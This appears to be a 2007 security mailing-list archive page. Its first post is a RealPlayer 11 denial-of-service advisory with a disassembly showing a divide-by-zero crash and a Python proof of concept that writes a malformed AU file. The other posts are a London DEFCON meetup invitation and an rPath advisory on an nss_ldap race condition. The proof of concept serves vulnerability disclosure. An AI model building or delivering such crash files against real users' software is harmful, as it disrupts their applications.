Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP

2007-12-01 Thread thesinoda 
Type : DOS attack when processing a malformed AU file.

Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2

Date : 01-12-2007  

Author : Adonis, Abed safehack.com 

Link : http://www.safehack.com/Advisory/realpdos_au.txt



Disclaimer

--

The information in this text is believed to be true based on 

experiments though it may be false.

This material is presented for informational purposes ONLY.

We do not accept any liability for anything anyone does with this

Information.


Brief History

-

Link : http://www.safehack.com/Advisory/realpdos_au.txt

RealPlayer 11 is prone to a denial-of-service vulnerability when

processing a malformed AU file.


A remote attacker can exploit this issue to crash the affected

application, denying service to legitimate users.



The Problem

---

Instructions: :

  :

630A87D5   894E 76  MOV DWORD PTR DS:[ESI+76],ECX :

630A87D8   1BDB SBB EBX,EBX   :

630A87DA   83E3 03  AND EBX,3 :

630A87DD   83C3 08  ADD EBX,8 :

630A87E0   0FAFFB   IMUL EDI,EBX  :

630A87E3   D1E7 SHL EDI,1 :

630A87E5   33D2 XOR EDX,EDX   :

630A87E7   F7F7 DIV EDI  <- division by zero, crash   :

  :

  :

Registers::

  :

EAX 

ECX 

EDX 

EBX 000B

ESP 07F5FE14

EBP 07F5FE24

ESI 01DE0E48

EDI 

EIP 630A87E7 pnen3260.630A87E7



Hex Dump:


00411000  00 00 00 00 9C CF 40 00  [EMAIL PROTECTED]

00411008  90 D3 40 00 A0 D3 40 00  [EMAIL PROTECTED] [EMAIL PROTECTED]

00411010  C0 D3 40 00 E0 D3 40 00  [EMAIL PROTECTED]@.

00411018  00 D4 40 00 10 D4 40 00  [EMAIL PROTECTED]@.

00411020  00 00 00 00 00 00 00 00  

00411028  00 00 00 00 00 00 00 00  



-:P.O.C.:-

+-

#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie


import sys

import os


head = 

("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+

"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+ 

"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+   

"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")


print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka 
Nophie."


try:

   f = open("test.au",'w')

except IOError, e:

print "Unable to open file ", e

sys.exit(0)


print "[x] File sucessfully opened for writing."

try:

   f.write(head)

except IOError, e:

print "Unable to write to file ", e

sys.exit(0)

print "[x] File successfully written."

f.close()

print "[x] Open test.au with RealPlayer 11."




+-.

Peace to you all:all and Happy New Year full of health and Peace  :

+-.

DC4420 - London DEFCON chapter Christmas Party - 11th December

2007-12-01 Thread Major Malfunction 

hi all,

you are cordially invited to the final DC4420 meet of 2007, which will 
be held on Tuesday the 11th December, at the usual location - Charing 
Cross Sports Club, Charing Cross Hospital:


http://www.multimap.com/map/browse.cgi?lat=51.4857&lon=-0.2194&scale=5000&icon=x

more info here:

  http://dc4420.org

we have the bar to ourselves and there will be no particular agenda 
other than drinking the place dry, eating good food and socialising, but 
we will definitely also be celebrating Alien's continued presence on our 
home planet after his near miss with the man in the black cloak!


all are welcome... "fight club" speaking rules are suspended for the 
evening, so bring a friend or two and make this a party to remember!


cheers,
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

rPSA-2007-0255-1 nss_ldap

2007-12-01 Thread rPath Update Announcements 
rPath Security Advisory: 2007-0255-1
Published: 2007-11-30
Products:
rPath Linux 1

Rating: Minor
Exposure Level Classification:
Local Weakness
Updated Versions:
[EMAIL PROTECTED]:1/239-9.2-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1913

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794

Description:
Previous versions of the nss_ldap package contain a race condition that
can cause nss_ldap to return incorrect data to requesting processes.

http://wiki.rpath.com/Advisories:rPSA-2007-0255

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html